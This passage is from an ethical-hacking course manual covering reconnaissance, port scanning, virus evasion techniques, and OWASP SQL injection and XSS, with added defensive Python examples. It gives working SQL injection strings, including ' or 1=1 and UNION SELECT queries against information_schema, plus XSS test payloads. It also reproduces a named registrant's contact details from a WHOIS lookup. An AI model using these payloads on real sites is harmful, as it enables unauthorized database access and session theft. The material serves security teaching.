
Course Material

Ethical Hacking & Information Security

By
Sunny Vaghela
www.sunnyvaghela.com
Head Office: A 805 Wallstreet 2, Opp Orient Club, Near Gujarat College, Ahmedabad 380007
Office: +91 79 40047405, Mobile: +91 9898493002
Website: www.techdefence.com  Email: info@techdefence.com
India Branch Offices: Vallabh Vidyanagar, Rajkot, Himmatnagar, Nashik, Hyderabad
International Offices: Australia, Mauritius

INDEX

Sr No.  Title                                         Page No.

Ethical Hacking
1.1     Cyber Ethics
1.2     Information Gathering
1.3     Scanning                                      17
1.4     Virus, Worms & Trojans                        22

Web Application Security
2.1     Why Web Application Security?                 27
2.2     Security Misconceptions                       29
2.3     Reasons for Attacking Web Applications        30
2.4     OWASP Top 10 Vulnerabilities                  31
2.5     Security guidelines                           44

Wireless Hacking & Security
3.1     Wireless Standards                            47
3.2     WEP & WPA Summary                             55
3.3     Cracking WEP & WPA & Countermeasures          56

CHAPTER 1

Ethical Hacking

1.1 Cyber Ethics
1.2 Information Gathering
1.3 Scanning
1.4 Virus, Worms, Trojans and Virus analysis

1.1 CYBER ETHICS

Cyber ethics is a code of behaviour for using the Internet. Since we are going to view it
from the hacker's perspective, we will first dissect what the word "hacker" stands for.

Hacker:
A person who delights in having an intimate understanding of the internal workings of a
system, computers and computer networks in particular. It is used to refer to someone
skilled in the use of computer systems, especially if that skill was obtained in an exploratory
way. The term is often misused in a pejorative context, where "cracker" would be the
correct term, and because of that the term evolved to be applied to individuals, with or
without skill, who break into security systems. Several subgroups of the computer
underground, with different attitudes and aims, use different terms to demarcate themselves
from each other, or try to exclude some specific group with which they do not agree. In
hacker culture there are many different categories, such as white hat (ethical hacking),
grey hat, black hat and script kiddies. Usually the term cracker refers to black hat hackers,
or more generally hackers with unlawful intentions.

1. White Hat
A white hat is the hero or good guy, especially in computing slang, where it refers to an
ethical hacker or penetration tester who focuses on securing and protecting IT systems.
White hat hackers, also known as ethical hackers, are computer security experts who
specialize in penetration testing and other testing methodologies to ensure that a
company's information systems are secure. Such people are employed by companies, where
these professionals are sometimes called sneakers, tiger teams or red teams.

2. Grey Hat
A grey hat, in the hacking community, refers to a skilled hacker who sometimes acts
legally, sometimes in good will, and sometimes not. They are a hybrid between white and
black hat hackers. They usually do not hack for personal gain or have malicious intentions,
but may or may not occasionally commit crimes during the course of their technological
exploits.

3. Black Hat
A black hat is the villain or bad guy. It refers to a hacker who breaks into networks or
computers, or creates computer viruses. Black hat hackers (also called "crackers")
specialize in unauthorized penetration of information systems. They may use computers to
attack systems for profit, for fun, for political motivations or as part of a social cause.
Such penetration often involves modification and/or destruction of data, and is done
without authorization; hence they should not be confused with ethical hackers.

4. Phreaker
Phreaking is a slang term coined to describe the activity of a subculture of people who
study, experiment with, or explore telecommunication systems, such as equipment and
systems connected to public telephone networks. As telephone networks have become
computerized, phreaking has become closely linked with computer hacking. This is
sometimes called the H/P culture (with H standing for Hacking and P standing for
Phreaking). The term "phreak" is a mixture of the words "phone" and "freak", and may also
refer to the use of various audio frequencies to manipulate a phone system. "Phreak",
"phreaker", or "phone phreak" are names used for and by individuals who participate in
phreaking.

5. Script Kiddies
In hacker culture, a script kiddie (occasionally script bunny, skiddie, script kitty,
script-running juvenile (SRJ), or similar) is a derogatory term used to describe those who
use scripts or programs developed by others to attack computer systems and networks.
It is generally assumed that script kiddies are amateurs who lack the ability to write
sophisticated hacking programs or exploits on their own, and that their objective is to
impress their friends or gain credit in underground hacker communities.

6. Hacktivists
Some people describing themselves as hacktivists have taken to defacing websites for
political reasons, such as attacking and defacing government websites as well as websites
of groups who oppose their ideology. "Hacktivist" is a mixture of the words hacker and
activist. Their activities span many political ideals and issues. Hacktivism is a
controversial term. Some argue it was coined to describe how electronic direct action might
work toward social change by combining programming skills with critical thinking. Others
use it as practically synonymous with malicious, destructive acts that undermine the
security of the Internet as a technical, economic, and political platform.

Malicious Hacker Strategies:

Just as there are steps to develop any software, every hacker follows some predefined
rules or steps to break into a system. They are:

Reconnaissance: the basic information gathering about the target system.

Scanning: scanning the target system for open ports, the services running on the open
ports, etc.

Gaining Access: gaining actual access to the target system by exploiting the system.

Maintaining Access: keeping access to the system even after leaving it, so as not to have
to perform all the steps from scratch.

Clearing Tracks: removing footprints, if any, so as to remain undetected by the victim.

1.2 Information Gathering

Information gathering is the initial process as far as hacking and investigation are
concerned. It is the process of profiling any organization, system, server or individual
using a methodical procedure.
Information gathering is used by attackers as well as investigators to get more
information about the target.

Attacker's point of view:
An attacker will first gather initial information like domain name, IP address, network IP
range, operating system, services, control panel information, vulnerable services etc.
before attacking the system.

Footprinting is required to ensure that isolated information repositories that are critical to
the attack are not overlooked or left undiscovered. Footprinting comprises only one aspect
of the entire information gathering process, but is considered one of the most important
stages of a mature hack.

An attacker will spend 90% of the time on information gathering and only 10% of the time
attacking and gaining access to the system.

Investigator's point of view:
An investigator will gather initial information like traces of the criminal on the Internet,
his/her name, occupation, address, contact number and company/organization before
taking any legal action.

This will help the investigator to profile the criminal and his/her activities properly
during interrogation.

Following are the various methodologies for information gathering.

1. Information gathering using search engines:

One leaves footprints/information everywhere while surfing the Internet. This is the basic
principle for investigators as well as hackers; the only difference is the way they use this
information.

An attacker will gather information about the system, its operating system and the
vulnerable applications running on it, and later exploit it.

An investigator will gather information on how the attacker got access to the system and
where he/she left footprints behind on that system, and later trace it.

Search engines are the most powerful tools to search for information about any
individual, organization or system.

Following is a list of top 10 search engines:

Google Search (world's most powerful search engine): www.google.com
Yahoo Search: www.search.yahoo.com
MSN Live Search: www.live.com
AOL Search: www.search.aol.in
Ask Search: www.ask.com
Altavista Search: www.altavista.com
Fast Search: www.alltheweb.com
Gigablast: www.gigablast.com
Snap Search: www.snap.com
2. Information gathering using relational search engines.
These types of search engines get results from different search engines and make
relations or connections between those results.

Kartoo

Maltego
Maltego is an open source intelligence and forensics application. It allows for the mining
and gathering of information as well as the representation of this information in a
meaningful way. Coupled with its graphing libraries, Maltego allows you to identify key
relationships between pieces of information and to identify previously unknown
relationships between them. It is a must-have tool in the forensics, security and intelligence
fields! Maltego offers the user unprecedented information. Information is leverage.

People Search: an investigator can find personal information using people search.
People search will give information about phone numbers and addresses as well as
background information about organizations.

Yahoo People Search - www.people.yahoo.com

Intelius:

Whois Lookup:
WHOIS (pronounced "who is"; not an acronym) is a query/response protocol which is
widely used for querying an official database in order to determine the owner of a domain
name, an IP address, or an autonomous system number on the Internet. WHOIS lookups
were traditionally made using a command line interface, but a number of simplified
web-based tools now exist for looking up domain ownership details from different databases.
Web-based WHOIS clients still rely on the WHOIS protocol to connect to a WHOIS server
and do lookups, and command-line WHOIS clients are still quite widely used by system
administrators. WHOIS normally runs on TCP port 43.

Presently ICANN is undertaking a study to determine the uses and abuses of WHOIS
information. Other ongoing studies concern the accuracy of WHOIS information and the
effectiveness of the processes for reporting inaccurate public WHOIS information.

Querying Regional Internet Registries:

WHOIS servers belonging to Regional Internet Registries (RIRs) can be queried to
determine the Internet Service Provider responsible for a particular IP address. These
servers are:
ARIN - http://whois.arin.net
RIPE NCC - http://www.ripe.net/whois/
APNIC - http://whois.apnic.net
LACNIC - http://whois.lacnic.net
AfriNIC - http://whois.afrinic.net

The records of each of these registries are cross-referenced, so that a query to ARIN for a
record which belongs to RIPE will return a placeholder pointing to the RIPE WHOIS
server. This lets the WHOIS user making the query know that the detailed information
resides on the RIPE server. Apart from the RIRs mentioned above, there is also a
commercial global service, the Routing Assets Database, used by some large networks
(e.g. large Internet providers that acquired other ISPs in several RIR areas).
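As an added illustration of the protocol described above (example code written for this edition, not part of the original course material), the following Python builds the single-line WHOIS request, parses a "Key: value" response, and recognises the placeholder referral that one RIR returns for a block another RIR manages. Both responses are constructed samples, and although a live lookup function over TCP/43 is included, nothing below contacts a server.

```python
import socket

WHOIS_PORT = 43  # WHOIS runs on TCP port 43


def build_whois_query(name: str) -> bytes:
    """Encode a WHOIS request: one object name followed by CRLF."""
    name = name.strip()
    if not name or "\r" in name or "\n" in name:
        raise ValueError("query must be a single non-empty line")
    return name.encode("ascii") + b"\r\n"


def parse_whois_response(text: str) -> dict:
    """Turn 'Key: value' lines into a dict with lower-cased keys.

    A key that repeats, such as 'Name Server', collects into a list.
    Comment lines (% or #) and blank lines are skipped.
    """
    record = {}
    for raw in text.splitlines():
        line = raw.strip()
        if not line or line.startswith(("%", "#")) or ":" not in line:
            continue
        key, _, value = line.partition(":")
        key, value = key.strip().lower(), value.strip()
        if not value:
            continue
        if key in record:
            if isinstance(record[key], list):
                record[key].append(value)
            else:
                record[key] = [record[key], value]
        else:
            record[key] = value
    return record


def referral_server(record: dict):
    """Return the WHOIS server a placeholder record points to, or None.

    ARIN-style records use 'ReferralServer: whois://host'; IANA uses 'refer: host'.
    """
    for key in ("referralserver", "refer"):
        value = record.get(key)
        if value:
            if isinstance(value, list):
                value = value[0]
            return value.replace("whois://", "").split()[0]
    return None


def whois_lookup(name: str, server: str, follow_referral: bool = True) -> dict:
    """Live lookup over TCP/43 (not exercised here); follows at most one referral."""
    with socket.create_connection((server, WHOIS_PORT), timeout=10.0) as sock:
        sock.sendall(build_whois_query(name))
        chunks = []
        while True:
            data = sock.recv(4096)
            if not data:
                break
            chunks.append(data)
    record = parse_whois_response(b"".join(chunks).decode("utf-8", "replace"))
    nxt = referral_server(record)
    if follow_referral and nxt and nxt != server:
        return whois_lookup(name, nxt, follow_referral=False)
    return record


# Constructed sample responses (not real registry output).
SAMPLE_DOMAIN_RESPONSE = """\
% Constructed sample, modelled on the techdefence.com record discussed above
Domain Name: techdefence.com
Registrar: DIRECT INTERNET SOLUTIONS PVT LTD
Name Server: ns1.hosthunger.com
Name Server: ns2.hosthunger.com
Status: Active
"""

SAMPLE_RIR_PLACEHOLDER = """\
# Constructed placeholder of the kind ARIN returns for a block another RIR manages
NetRange: 192.0.2.0 - 192.0.2.255
NetName: EXAMPLE-BLOCK
ReferralServer: whois://whois.ripe.net
"""
```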

Domain Tools:

Whois.net
Samspade.org
.In registry

Example: www.techdefence.com whois info using www.domaintools.com

The above picture indicates that the website www.techdefence.com has the title TechDefence
Consulting. Its Search Engine Optimization score is 62% for 23 terms.

The techdefence.com domain is registered through DIRECT INTERNET SOLUTIONS PVT
LTD. The record also gives the creation date, expiry date and last modified date of the domain.
The name servers ns1.hosthunger.com and ns2.hosthunger.com give information about the
hosting server.

The server data is Apache, which means that Linux is the operating system running on the
techdefence server.

The IP address of techdefence.com is 208.43.231.66.
The server company is SoftLayer Technologies.
The domain status is Active.

Registrant:
TechDefence Consulting Pvt Ltd
Sunny Vaghela
(sunny@sunnyvaghela.com)
Ahmedabad
Ahmedabad
Gujarat, 380007
INDIA
Tel. +91.7926631931

The above information tells that the domain techdefence.com is registered by Sunny Vaghela
from Ahmedabad. The phone number of Sunny Vaghela is +91 7926631931. The email ID used
to register the website is sunny@sunnyvaghela.com.

Reverse IP Mapping:
Reverse IP mapping is the method of finding the number of websites hosted on the same
server.

Here, by selecting the Reverse IP link, we can get the list of websites hosted on
208.43.231.66 along with techdefence.com.

Trace Route:
Traceroute gives useful information regarding the number of servers between your computer
and a remote computer. It is useful for investigation as well as for different attacks.

Tools: VisualRoute, NeoTrace.

NeoTrace gives a Map view, a Node view as well as a List view of the nodes between your
computer and the remote computer.

Map View for www.techdefence.com

List View for techdefence.com

Node View for techdefence.com

Information of Server Node (last node)

Geowhere:
Finds websites using popular newsgroups; also finds mailing lists and newsgroups, and
extracts information from 20 search engines.

Email Spiders
Email spiders are automated programs which capture email IDs using web spiders and store
them in a database. Spammers use email spiders to collect thousands of emails for spamming
purposes.

Other Tools:
www.visualroute.visualware.com
www.samspade.org
www.dnsstuff.com

1.3 Scanning

Long ago, different ports were scanned by connecting with telnet manually. Today people
use more sophisticated programs with mass methods to scan IP ranges, searching a lot of
ports.

Scanning is the process of finding open/closed ports and vulnerabilities in remote systems,
servers and networks. Scanning will reveal the IP addresses, operating systems and services
running on the remote computer.
There are three types of scanning:
1. Port Scanning
2. Network Scanning
3. Vulnerability Scanning

Port Scanning:

Port scanning is one of the most popular techniques attackers use to discover the services
they can break into.

All machines connected to a LAN or connected to the Internet via a modem run many
services that listen at well-known and not so well-known ports.

Ports 1 to 65535 are available on a computer. By port scanning, the attacker finds which
ports are available.

Ports: port numbers are unique only within a computer system. Port numbers are 16-bit
unsigned numbers.

The port numbers are divided into three ranges:

1. Well Known Ports (0..1023),
2. The Registered Ports (1024..49151),
3. The Dynamic and/or Private Ports (49152..65535).

Well Known Ports:

Service    Port      Description
echo       7/tcp     Echo
ftp-data   20/udp    File Transfer [Default Data]
ftp        21/tcp    File Transfer [Control]
ssh        22/tcp    SSH Remote Login Protocol
telnet     23/tcp    Telnet
smtp       25/tcp    Simple Mail Transfer Protocol
whois      43/tcp    whois server
domain     53/udp    Domain Name Server
www-http   80/tcp    World Wide Web HTTP

Registered Ports:

Service    Port            Description
wins       1512/tcp        Microsoft Windows Internet Name Service
radius     1812/udp        RADIUS authentication protocol
yahoo      5010            Yahoo! Messenger
x11        6000-6063/tcp   X Window System

TCP Packet Header

Flags and fields of the TCP header: SYN, ACK, RST, PSH, URG, FIN, TTL, WINDOW.

SYN (synchronize): used to initiate a connection between hosts.
ACK (acknowledgement): used to establish a connection between hosts.
PSH (push): tells the receiving system to send all buffered data.
URG (urgent): states that the data contained in the packet should be processed immediately.
FIN (finish): tells the remote system that there will be no more transmission.
TTL: Time to Live.

Open Scan
Known as TCP scan and normally used with programmed sockets, this technique is the
oldest and works by making a full connection with the server.

For that it performs an authentication with 3 packets, known as the three-way handshake:

For open ports:

Client ----> SYN ---->
        <---- SYN/ACK <---- Server
Client ----> ACK ---->

For closed ports:

Client ----> SYN ---->
        <---- RST <---- Server

Advantages: very easy to program.
Disadvantages: very easy to detect, and a log entry is made for each connection.

TCP connect()

The connect() system call provided by an OS is used to open a connection to every
interesting port on the machine. If the port is listening, connect() will succeed; otherwise
the port isn't reachable.

Stealth Scan:

A stealth scan is a kind of scan that is designed to go undetected by auditing tools.

Fragmented Scan: the scanner splits the TCP header into several IP fragments. This
bypasses some packet filter firewalls because they cannot see a complete TCP header that
can match their filter rules.

SYN Scan:

This technique is called half-open scanning because a TCP connection is not completed.
A SYN packet is sent to the remote computer. If the target host responds with SYN+ACK,
this indicates the port is listening; an RST indicates a non-listener.

FIN Scan:

Another technique sends erroneous packets at a port, expecting that open listening ports
will send back different error messages than closed ports. Closed ports reply to FIN packets
with RST. Open ports ignore the packets.

XMAS Scan:

An XMAS scan sends packets in which all flags in the TCP header are set to the target
host. Closed ports reply with RST. Open ports ignore the packets.

NULL Scan:

A NULL scan sets no flags in the TCP header and sends the packet to the target host.
Closed ports reply with RST. Open ports ignore the packets.
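Added example (not from the original material): a Python sketch of how a defender would recognise the probe types just described. It decodes the 20-byte TCP header, names the technique from the flag combination, models the reply the text gives for open and closed ports, and flags a source whose scan-like packets touch many ports. The packets are constructed inside the block; the XMAS rule accepts both the "all flags set" form described above and the FIN/PSH/URG form Nmap sends.

```python
import struct

# TCP flag bits, byte 13 of the header (low six bits).
FIN, SYN, RST, PSH, ACK, URG = 0x01, 0x02, 0x04, 0x08, 0x10, 0x20
ALL_FLAGS = FIN | SYN | RST | PSH | ACK | URG
FLAG_NAMES = {FIN: "FIN", SYN: "SYN", RST: "RST", PSH: "PSH", ACK: "ACK", URG: "URG"}
HEADER_FMT = "!HHIIBBHHH"  # ports, seq, ack, offset/reserved, flags, window, checksum, urgent


def parse_tcp_header(segment: bytes) -> dict:
    """Decode the fixed 20-byte TCP header into a dict of fields."""
    if len(segment) < 20:
        raise ValueError("truncated TCP header")
    src, dst, seq, ack, off_res, flags, window, _csum, _urg = struct.unpack(
        HEADER_FMT, segment[:20])
    return {"src_port": src, "dst_port": dst, "seq": seq, "ack": ack,
            "data_offset": off_res >> 4, "flags": flags & ALL_FLAGS, "window": window}


def flag_names(flags: int) -> list:
    """Human-readable flag list, e.g. ['FIN', 'PSH', 'URG']."""
    return [name for bit, name in FLAG_NAMES.items() if flags & bit]


def classify_probe(flags: int) -> str:
    """Name the scan technique implied by the first packet of a probe."""
    flags &= ALL_FLAGS
    if flags == 0:
        return "NULL scan"
    if flags in (ALL_FLAGS, FIN | PSH | URG):
        return "XMAS scan"
    if flags == FIN:
        return "FIN scan"
    if flags == SYN:
        return "SYN probe"  # half-open scan, or the first packet of connect()
    if flags & ACK:
        return "established traffic"
    return "other"


def expected_reply(probe_flags: int, port_open: bool) -> str:
    """The target's reply for each technique, as described in the text above."""
    kind = classify_probe(probe_flags)
    if kind == "SYN probe":
        return "SYN/ACK" if port_open else "RST"
    if kind in ("FIN scan", "XMAS scan", "NULL scan"):
        return "no reply" if port_open else "RST"
    return "unspecified"


def make_segment(src_port: int, dst_port: int, flags: int,
                 seq: int = 0, ack: int = 0, window: int = 1024) -> bytes:
    """Build a bare 20-byte TCP header (constructed input; checksum left zero)."""
    return struct.pack(HEADER_FMT, src_port, dst_port, seq, ack, 5 << 4, flags, window, 0, 0)


def detect_scans(packets, threshold: int = 5) -> dict:
    """packets: iterable of (src_ip, tcp_header_bytes).

    Returns {src_ip: {"ports": [...], "kinds": [...]}} for sources whose
    scan-like first packets touched at least `threshold` distinct ports.
    """
    seen = {}
    for src_ip, segment in packets:
        header = parse_tcp_header(segment)
        kind = classify_probe(header["flags"])
        if kind in ("established traffic", "other"):
            continue
        entry = seen.setdefault(src_ip, {"ports": set(), "kinds": set()})
        entry["ports"].add(header["dst_port"])
        entry["kinds"].add(kind)
    return {ip: {"ports": sorted(e["ports"]), "kinds": sorted(e["kinds"])}
            for ip, e in seen.items() if len(e["ports"]) >= threshold}


# Constructed traffic: one host sweeps several well-known ports, another just browses.
SAMPLE_PACKETS = (
    [("192.0.2.10", make_segment(40000 + i, port, SYN))
     for i, port in enumerate((21, 22, 23, 25, 80, 443))]
    + [("192.0.2.10", make_segment(40010, 139, FIN | PSH | URG))]
    + [("198.51.100.7", make_segment(50000, 80, SYN)),
       ("198.51.100.7", make_segment(50000, 80, ACK | PSH))]
)
```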

Port Scanner: NMAP

Nmap is a powerful utility for scanning large networks. It is provided with a GUI as well as
a command line interface, and is supported by many operating systems. It can carry out SYN
scans, FIN scans, stealth scans, half-open scans and many other types.

Network Scanners: Global Network Inventory Software:

1.4 Virus, Worms, Trojans and Virus analysis

Spyware

Spyware is a piece of software that gets installed on a computer without your consent. It
collects your personal information without you being aware of it. It can also change how your
computer or web browser is configured and bombard you with online advertisements.
Spyware programs are notorious for being difficult to remove on your own and for slowing
down your PC. The program gets installed in the background while you are doing something
else on the Internet. Spyware has become fairly widespread because your cable modem or
DSL connection is always connected.

Difference between Virus, Worms and Trojans

A virus is an application that self-replicates by injecting its code into other data files. A
virus spreads and attempts to consume specific targets, which are normally executables.
A worm copies itself over a network. It is a program that views its infection points as other
computers rather than as other executable files on an already infected computer.
A Trojan is a program that, once executed, performs a task other than expected.

Modes of Transmission
IRC
ICQ
Email Attachments
Physical Access
Browser & email Software Bugs
Advertisements
NetBIOS
Fake Programs

Virus Properties
Your computer can be infected even if files are just copied.
Can be polymorphic.
Can be memory or non-memory resident.
Can be a stealth virus.
Viruses can carry other viruses.
Can make the system never show outward signs.
Can stay on the computer even if the computer is formatted.

Virus Operation Phase

Most viruses operate in two phases.
1. Infection Phase: in this phase virus developers decide
- when to infect programs
- which programs to infect
Some viruses infect the computer as soon as the virus file is installed on the computer.
Some viruses infect the computer at a specific date, time or particular event.
TSR viruses are loaded into memory and infect the PC later.

2. Attack Phase: in this phase the virus will
- delete files,
- replicate itself to other PCs,
- corrupt targets only.

Virus Indications
Following are some of the common indications of a virus when it infects a system.
Files have stranger names than normal.
File extensions can also be changed.
Programs take longer to load than normal.
The computer's hard drive constantly runs out of free space.
The victim will not be able to open some programs.
Programs get corrupted without any reason.

Virus Types
Following are some of the common types of virus.
Macro Virus: spreads and infects database files.
File Virus: infects executables.
Source Code Virus: affects and damages source code.
Network Virus: spreads via network elements and protocols.
Boot Virus: infects boot sectors and records.
Shell Virus: the virus code forms a shell around the target host's genuine program and hosts
it as a subroutine.
Terminate & Stay Resident Virus: remains permanently in memory during the work session
even after the target host is executed and terminated.

Methods to Avoid Detection

1. Same last modified date.
In order to avoid detection by users, some viruses employ different kinds of deception.
Some old viruses, especially on the MS-DOS platform, make sure that the "last modified"
date of a host file stays the same when the file is infected by the virus. This approach
sometimes fools anti-virus software.

2. Overwriting unused areas of .exe files.

3. Killing tasks of anti-virus software.
Some viruses try to avoid detection by killing the tasks associated with anti-virus software
before it can detect them.

4. Avoiding bait files and other undesirable hosts.
Bait files (or goat files) are files that are specially created by anti-virus software, or by
anti-virus professionals themselves, to be infected by a virus. Many anti-virus programs
perform an integrity check of their own code. Infecting such programs will therefore
increase the likelihood that the virus is detected. Anti-virus professionals can use bait files
to take a sample of a virus.

5. Making a stealth virus.
Some viruses try to trick anti-virus software by intercepting its requests to the operating
system. The virus can then return an uninfected version of the file to the anti-virus
software, so that it seems that the file is "clean".

6. Self-modification on each infection.
Some viruses try to trick anti-virus software by modifying themselves on each infection.
As the file signatures are modified, anti-virus software finds it difficult to detect them.

7. Encryption with a variable key.
Some viruses use simple methods to encipher their code. The virus is encrypted with a
different encryption key on each infection. The AV cannot scan such files directly using
conventional methods.

Virus Analysis

1. IDA Pro tool
It is a disassembler and debugger tool. It runs on both Linux and Windows, and can be used
in source code analysis, vulnerability research and reverse engineering.

Autoruns:

Process Explorer

CHAPTER 2

Web Application Hacking & Security

2.1 Why Web Application Security?
2.2 Security Misconceptions
2.3 Reasons for Attacking Web Applications
2.4 OWASP Top 10 Vulnerabilities
2.5 Security guidelines
2.6 Web Application Security checklist

2.1 Why Web Application Security?

Problem Illustration

Application Layer
The attacker sends attacks inside valid HTTP requests.
Your custom code is tricked into doing something it should not.
Security requires software development expertise, not signatures.

Network Layer
Firewall, hardening, patching, IDS, and SSL cannot detect or stop attacks inside HTTP
requests.
Security relies on signature databases.

2.2 Security Misconceptions

The firewall protects my web server and database
Access to the server through ports 80 and 443 makes the web server part of your external
perimeter defense. Vulnerabilities in the web server software or web applications may allow
access to internal network resources.

The IDS protects my web server and database
The IDS is configured to detect signatures of various well-known attacks. Attack signatures
do not include those for attacks against custom applications.

SSL secures my site
SSL secures the transport of data between the web server and the user's browser. SSL does
not protect against attacks against the server and applications. SSL is the hacker's best
friend due to the false sense of security.

The Source of the Problem

"Malicious hackers don't create security holes; they simply exploit them. Security holes
and vulnerabilities, the real root cause of the problem, are the result of bad software
design and implementation."
- John Viega & Gary McGraw

2.3 Reasons For Attacking Web Applications

Vulnerability Used

2.4 OWASP TOP 10 VULNERABILITIES

1. INJECTION FLAWS

Injection means tricking an application into including unintended commands in the data
sent to an interpreter.

Interpreters take strings and interpret them as commands: SQL, OS shell, LDAP, XPath, etc.

SQL injection is still quite common. Many applications are still susceptible.

INJECTION FLAWS: how the attack flows

1. The application presents a form to the attacker, all via SSL.
2. The attacker sends an attack in the form data.
3. The application forwards the attack to the database in a SQL query.
4. The database runs the query containing the attack and sends encrypted results back to
the application.
5. The application decrypts the data as normal and sends the results to the user.

SQL INJECTION

It is a flaw in "web application" development; it is not a DB or web server problem.
Most programmers are still not aware of this problem. A lot of the tutorials and demo
templates are vulnerable. Even worse, a lot of solutions posted on the Internet are not
good enough. In our pen tests over 60% of our clients turn out to be vulnerable to SQL
injection.

BUSINESS IMPACT OF SQL INJECTION

Attackers can:
Access the entire database schema
Steal, modify, and delete database contents
Prevent legitimate access to the database
Run operating system commands on the database server
Disclose company proprietary data

Common vulnerable login query

SELECT * FROM users WHERE login = 'victor' AND password = '123'

(If it returns something then login!)

ASP/MS SQL Server login syntax

var sql = "SELECT * FROM users WHERE login = '" + formusr + "' AND password = '" + formpwd + "'";

Injecting Through Strings

formusr = ' or 1=1
formpwd = anything

The final query would look like this:

SELECT * FROM users WHERE login = ' ' or 1=1 AND password = 'anything'

THE POWER OF '

It closes the string parameter. Everything after it is considered part of the SQL command.

SELECT * FROM clients WHERE account = 12345678 AND pin = 1111

PHP/MySQL login syntax

$sql = "SELECT * FROM clients WHERE " .
       "account = $formacct AND " .
       "pin = $formpin";

Injecting Numeric Fields

$formacct = 1 or 1=1 #
$formpin = 1111

The final query would look like this:

SELECT * FROM clients WHERE account = 1 or 1=1 # AND pin = 1111
Standard SQL commands such as "Select", "Insert", "Update", "Delete", "Create", and
"Drop" can be used to accomplish almost everything that one needs to do with a database.

When you click a link like this,

www.site.com/news.asp?ArticleID=10

the link tells the site to look in the table that stores the article names for an article whose
"ArticleID" is 10.

The "INFORMATION_SCHEMA" holds the names of every table and column on a site.
On every SQL server there will be an "INFORMATION_SCHEMA" and its name will
never change.

Understanding Error Messages

Example: www.site.com/index.php?id=1

Add ' or /* after id=1 to check whether the site is vulnerable or not. If the site gives some
error then it is vulnerable to SQL injection. If a blank page is shown then the site is
vulnerable to blind injection.

Finding out Vulnerable Columns

Example: www.site.com/index.php?id=1+order+by+1 --

Increase the order number until you get an error message something like:

Unknown column in order clause

Extracting Information from the database

www.site.com/index.php?id=1+union+all+select+1,table_name,3,4,5,6,7+from+information_schema.tables

The above query gives the names of the tables stored in the database.

www.site.com/index.php?id=1+union+all+select+1,column_name,3,4,5,6,7+from+information_schema.columns+where+table_schema=char()

The above query gives the names of the columns of all tables.

SQL Injection Mitigation

Strong Design
Define an easy "secure" path to querying data.
Use stored procedures for interacting with the database.
Call stored procedures through a parameterized API.
Validate all input through generic routines.
Use the principle of "least privilege".

Input Validation
Define data types for each field.
Implement stringent "allow only good" filters.
If the input is supposed to be numeric, use a numeric variable in your script to store it.
Reject bad input rather than attempting to escape or modify it.
Implement stringent "known bad" filters. For example: reject "select", "insert", "update",
"shutdown", "delete", "drop", "--", "'".

Harden the Server
Run the DB as a low-privilege user account.
Remove unused stored procedures and functionality, or restrict them to administrators.
Change permissions and remove "public" access to system objects.
Audit password strength for all user accounts.
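To make the contrast concrete, here is an added example (not from the original material) in Python with sqlite3: the concatenated login query from the SQL injection section beside the parameterized form that the mitigation list calls for, plus a numeric client lookup that stores the input in a numeric variable before binding it. The users and clients rows are constructed test data.

```python
import sqlite3


def make_db() -> sqlite3.Connection:
    """Constructed in-memory tables mirroring the login and client queries above."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (login TEXT, password TEXT)")
    conn.execute("INSERT INTO users VALUES ('victor', '123')")
    conn.execute("CREATE TABLE clients (account INTEGER, pin INTEGER, name TEXT)")
    conn.execute("INSERT INTO clients VALUES (12345678, 1111, 'constructed client')")
    conn.commit()
    return conn


def login_concatenated(conn, formusr: str, formpwd: str):
    """The vulnerable pattern: form values spliced into the SQL text.

    A quote in formusr closes the string literal, so whatever follows
    becomes part of the command, exactly as the section above describes.
    """
    sql = ("SELECT * FROM users WHERE login = '" + formusr
           + "' AND password = '" + formpwd + "'")
    return conn.execute(sql).fetchone()


def login_parameterized(conn, formusr: str, formpwd: str):
    """Hardened: placeholders keep the values out of the SQL grammar entirely."""
    sql = "SELECT * FROM users WHERE login = ? AND password = ?"
    return conn.execute(sql, (formusr, formpwd)).fetchone()


def client_lookup(conn, formacct: str, formpin: str):
    """Numeric fields: convert to int first (reject on failure), then bind."""
    try:
        account, pin = int(formacct), int(formpin)
    except ValueError:
        return None  # reject bad input rather than trying to clean it
    sql = "SELECT * FROM clients WHERE account = ? AND pin = ?"
    return conn.execute(sql, (account, pin)).fetchone()


def compare_logins(conn, formusr: str, formpwd: str) -> dict:
    """Run both versions on the same input so the difference is visible."""
    return {"concatenated": login_concatenated(conn, formusr, formpwd) is not None,
            "parameterized": login_parameterized(conn, formusr, formpwd) is not None}
```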

XSS (Cross Site Scripting)

Occurs any time raw data from an attacker is sent to an innocent user.

Raw data may be:
Stored in the database
Reflected from web input (form field, hidden field, URL, etc.)
Sent directly into a rich JavaScript client

Virtually every web application has this problem.

Try this in your browser: javascript:alert(document.cookie)

Stored XSS

Reflected XSS

Business Impact of XSS

Attackers can:
Steal user sessions for complete account takeover.
Steal data on web pages viewed by the victim.
Deface pages viewed by the victim.
Use web pages for phishing.

Finding XSS

Most common: blogs, forums, shout boxes, comment boxes, search boxes; there are too many
to mention.

Using Google dorks: search inurl:"search.php?q="

XSS Examples

http://site.com/search.php?q=<script>alert("XSS")</script>
http://site.com/search.php?q=<script>window.open("http://www.google.com/")</script>

Case Study: XSS

A British researcher, Jim Ley, discovered (2004) an XSS flaw in Google and provided this
proof-of-concept phishing page where Google becomes a paying service: "If you would be so
kind as to provide your credit card details". Now fixed.

Preventing XSS

Be sure that there is a plan for input validation and encoding.
Be sure that it applies to all input data.
Positive validation for all untrusted input fields.
HTML entity encoding method.

Fixing XSS

If you found XSS bugs in your scripts, they are easy to secure; take a look at the code
below.

if(isset($_POST['form'])){
    echo "<html><body>" . $_POST['form'] . "</body></html>";
}

Here the variable $_POST['form'] was coming from an input box, so you have an XSS
attack.

The following is a very easy way to secure that.

$charset = 'UTF-8';
$data = htmlentities($_POST['form'], ENT_NOQUOTES, $charset);
if(isset($data)){
    echo "<html><body>" . $data . "</body></html>";
}

This will take all possible code and make it not executable, by turning it into entities
like &lt; etc.

$id = $_GET['id'];
echo "you are viewing " . $id . " blog";

If we include ?id=<script>alert("XSS")</script> in the URL, it is going to execute our
code. A very easy way to secure this is using (int); check the following code:

$id = (int)$_GET['id'];
echo "you are viewing " . $id . " blog";

If at any time the variable contains anything but an integer, it will return 0.
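Added example in Python (the page's fix is PHP; this is not the original code): the same two fixes, output encoding for the free-text field and integer coercion for the id, with a helper that reproduces PHP's (int) cast so the "anything but an integer returns 0" rule above holds. html.escape with quote=True also encodes quotes, which ENT_NOQUOTES deliberately leaves alone; that matters once the value lands inside an attribute, as the search box renderer shows.

```python
import html
import re

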